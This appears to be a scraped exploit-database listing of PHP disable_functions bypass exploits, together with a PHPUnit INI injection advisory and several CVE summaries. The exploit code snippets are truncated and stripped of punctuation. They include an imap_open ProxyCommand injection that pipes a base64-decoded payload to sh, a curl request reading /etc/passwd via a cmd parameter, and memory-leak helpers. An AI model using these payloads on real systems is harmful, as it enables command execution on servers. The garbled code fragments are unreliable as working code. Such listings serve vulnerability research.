PHPUnit has Argument injection via newline in PHP INI values that are forwarded to child processes

Impact PHPUnit forwards PHP INI settings to child processes used for isolated/PHPT test execution as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newli...

PHP 7.4 FFI disable_functions Bypass

?php / FFI Exploit - uses 3 potential BUGS. PHP was contacted and said nothing in FFI is a security issue. Able to call system$cmd without using FFI::load or FFI::cdefs BUG 1 maybe intended, but why have any size checks then? no bounds check for FFI::String when type is ZENDFFITYPEPOINTER...

PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass

a; $backtrace = new Exception-getTrace; ; if!isset$backtrace1'args' PHP = 7.4 $backtrace = debugbacktrace; class Helper public $a, $b, $c, $d; function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$...

PHP 7.0 7.4 (Unix) - debug_backtrace disable_functions Bypass

PHP 7.0 7.4 Unix - debugbacktrace disablefunctions Bypass a; $backtrace = new Exception-getTrace; ; if!isset$backtrace1'args' PHP = 7.4 $backtrace = debugbacktrace; class Helper public $a, $b, $c, $d; function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8;...

PHP 7.3 disable_functions Bypass

= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...

PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass

= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...

PHP 7.x disable_functions Bypass

= 8; public function str2ptr&$str, $p = 0, $s = 8 $address = 0; for$j = $s-1; $j = 0; $j-- $address = 8; return $out; unable to leak ro segments public function leak1$addr global $spl1; $this-write$this-abc, 8, $addr - 0x10; return strlengetclass$spl1; the real deal public function leak2$addr, $p...

PHP 5.2.3 imap (Debian Based) - imap_open disable_functions Bypass

PHP 5.2.3 imap Debian Based - imapopen disablefunctions Bypass /tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...

PHP 5.2.3 imap (Debian Based) - 'imap_open' disable_functions Bypass

/tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...

Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass

Exploit Title: PHP Imagick disablefunctions Bypass Date: 2016-05-04 Exploit Author: RicterZ [email protected] Vendor Homepage: https://pecl.php.net/package/imagick Version: Imagick = 5.4 Test on: Ubuntu 12.04 Exploit: $ curl "127.0.0.1:8080/exploit.php?cmd=cat%20/etc/passwd" Disable functions:...

Imagick 3.3.0 (PHP 5.4) - disable_functions Bypass

Imagick 3.3.0 PHP 5.4 - disablefunctions Bypass Exploit Title: PHP Imagick disablefunctions Bypass Date: 2016-05-04 Exploit Author: RicterZ [email protected] Vendor Homepage: https://pecl.php.net/package/imagick Version: Imagick = 5.4 Test on: Ubuntu 12.04 Exploit: $ curl...

CVE-2007-5424

The disablefunctions feature in PHP 4 and 5 allows attackers to bypass intended restrictions by using an alias, as demonstrated by using inialter when iniset is disabled...

PHP 5.5.9 - zend_executor_globals CGIMode FPM WriteProcMemFile disable_functions Bypass Load Dynamic Library

PHP 5.5.9 - zendexecutorglobals CGIMode FPM WriteProcMemFile disablefunctions Bypass Load Dynamic Library ?php // EDB Note: Paper https://www.exploit-db.com/docs/english/38104-shoot-zendexecutorglobals-to-bypass-php-disablefunctions.pdf errorreporting0x66778899; settimelimit0x41424344;...

PHP < 5.6.2 - 'Shellshock' Safe Mode / disable_functions Bypass / Command Injection

Exploit Title: PHP 5.x Shellshock Exploit bypass disablefunctions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror Version: 5. tested on 5.6.2 Tested on: Debian 7 and CentOS 5 an...

Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability

No description provided by source. Verlihub Control Panel v 1.7 PHP 4.x Local File Inclusion http://vhcp.verlihub- project.org/ Bug Found By Methodman From TEAMELITE - dchub.nemesis.te-home.net:4120 Bug: Line: 27 - inisetmagicquotesgpc,1; ............................ Line: 71 - $pagename =...

PHP 4.0.x,5.0.0 disable_functions特征安全绕过漏洞

No description provided by source...

Directory traversal

Directory traversal vulnerability in autoinstall4imagesgalleryupgrade.php in the Fantastico De Luxe Module for cPanel allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the scriptpathshow parameter in a GoAhead action. NOTE: this issue only...

Design/Logic Flaw

The Component Object Model COM functions in PHP 5.x on Windows do not follow safemode and disablefunctions restrictions, which allows context-dependent attackers to bypass intended limitations, as demonstrated by executing objects with the kill bit set in the corresponding ActiveX control...

CVE-2007-5653

The CVE-2007-5653 entry concerns PHP 5.x on Windows where COM functions do not honor safe_mode or disable_functions, enabling context-dependent bypass of intended restrictions. The description cites concrete examples related to com_load_typelib and interactions with ActiveX/Windows components suc...

PHP 5.x COM - Safe Mode / disable_functions Bypass

sounds good //The windows version of PHP has built in support for this extension. You do not need to //load any additional extension in order to use these functions. //You are responsible for installing support for the various COM objects that you intend //to use such as MS Word; we don't and can...